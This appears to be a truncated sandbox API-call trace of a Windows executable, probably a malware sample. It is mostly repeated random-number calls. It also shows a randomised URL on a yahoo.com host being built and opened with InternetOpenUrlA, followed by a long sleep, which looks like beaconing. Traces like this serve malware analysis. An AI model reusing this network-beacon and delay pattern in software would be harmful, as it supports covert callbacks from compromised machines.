0x7ffc5bcc36b0 [0266.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0266.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a173fa, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a173fa) returned 0x0 [0266.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0266.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1740d, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a1740d) returned 0x0 [0266.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.976] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.976] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.976] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.979] GetProcessHeap () returned 0x440000 [0266.979] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4724e0 [0266.979] lstrcpyA (in: lpString1=0x4724e0, lpString2="«\x05\x95ls://www.yahoo.com" | out: lpString1="«\x05\x95ls://www.yahoo.com") returned="«\x05\x95ls://www.yahoo.com" [0266.979] lstrcatA (in: lpString1="«\x05\x95ls://www.yahoo.com", lpString2="/ab285tu4N3c07doqftpmn8oJ/f43wmgvfrup6emobxi/zcpdt4n9406tzDfzu2mljtbvavr0ocygxe1/" | out: lpString1="«\x05\x95ls://www.yahoo.com/ab285tu4N3c07doqftpmn8oJ/f43wmgvfrup6emobxi/zcpdt4n9406tzDfzu2mljtbvavr0ocygxe1/") returned="«\x05\x95ls://www.yahoo.com/ab285tu4N3c07doqftpmn8oJ/f43wmgvfrup6emobxi/zcpdt4n9406tzDfzu2mljtbvavr0ocygxe1/" [0266.979] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0266.979] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="«\x05\x95ls://www.yahoo.com/ab285tu4N3c07doqftpmn8oJ/f43wmgvfrup6emobxi/zcpdt4n9406tzDfzu2mljtbvavr0ocygxe1/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0266.979] GetProcessHeap () returned 0x440000 [0266.979] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4724e0 | out: hHeap=0x440000) returned 1 [0266.979] GetProcessHeap () returned 0x440000 [0266.979] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a173e0 | out: hHeap=0x440000) returned 1 [0266.980] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0266.980] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0266.980] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0266.980] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0266.980] Sleep (dwMilliseconds=0xec41) [0267.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0267.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0267.207] GetProcessHeap () returned 0x440000 [0267.207] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1a8b0 [0267.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0267.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1a8b1, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a1a8b1) returned 0x0 [0267.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0267.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0267.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0267.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1a8c6, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a1a8c6) returned 0x0 [0267.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.214] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.214] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.214] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.214] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.215] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 